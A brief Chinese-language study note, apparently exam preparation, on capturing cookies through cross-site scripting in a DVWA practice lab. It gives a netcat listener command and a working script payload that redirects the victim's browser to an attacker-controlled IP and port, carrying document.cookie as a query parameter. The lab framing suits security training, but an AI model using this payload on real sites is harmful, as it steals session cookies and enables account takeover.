考試也可能會遇到xss,很可惜也沒有弄到xss的靶場,但是我們可以模擬出一個類似考場的環境,這里用了dvwa。
xss靶場里key最有可能在的位置就是cookie里。考試用到的工具NC。
首先找到轉發工具的里nc.exe,雙擊后輸入命令 nc -Lv -p 1111
監聽1111端口 這里如果用小寫的l會在收到一次信息后閃退-p是指定端口,-v是輸出詳細信息
然后我們在靶場中存在xss的地方構造payload
<script>document.location='http://192.168.3.70:1111/?cookie='+document.cookie; alert('getit')</script>
如果是考試,圖可能是這樣的。
